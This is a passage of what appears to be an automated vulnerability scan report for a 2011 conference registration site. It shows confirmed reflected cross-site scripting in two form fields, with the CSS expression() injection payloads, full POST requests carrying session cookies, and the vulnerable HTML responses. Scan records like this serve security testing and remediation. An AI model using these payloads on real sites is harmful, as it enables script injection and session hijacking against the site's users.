20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST " stYle="x:expre/**/ssion(alert(9))

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=fb2fb1cd905d4c7d919b7fa6b719ac4e
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=scamggbr37vkhil8ks9b9rsn65
Content-Length: 1506
Accept-Encoding: gzip, deflate

--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="action"

preload_category
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="eventid"

19301
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="categoryid"

-1
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="language"

eng
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="reference"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="eb"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="admin"

-1
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="bridgeid"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="discountcode"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65419]"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65420]"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65413]"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65411]"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65421]"

3
--fb2fb1cd905d4c7d919b7fa6b719ac4e
Content-Disposition: form-data; name="catpassword[65407]"

" stYle="x:expre/**/ssion(netsparker(9))
--fb2fb1cd905d4c7d919b7fa6b719ac4e--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:53:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3390
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=6c97b6c7e8f342eeabf90b49f3a6e329
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=pkhcru7j3a4khmgt6ld096i540
Content-Length: 1217
Accept-Encoding: gzip, deflate

--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="action"

submit
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="admin"

-1
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="apply_code"

Apply Code
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="bridgeid"

3
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="categoryid"

65410
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="eb"

3
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="eventid"

19301
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="language"

eng
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="reference"

3
--6c97b6c7e8f342eeabf90b49f3a6e329
Content-Disposition: form-data; name="selectcategoryid"

65410
--6c97b6c7e8f342eeabf90b49f3a6e329--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:06:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=d61u5o0f8okvc6blji22u3juh4; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3105
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" 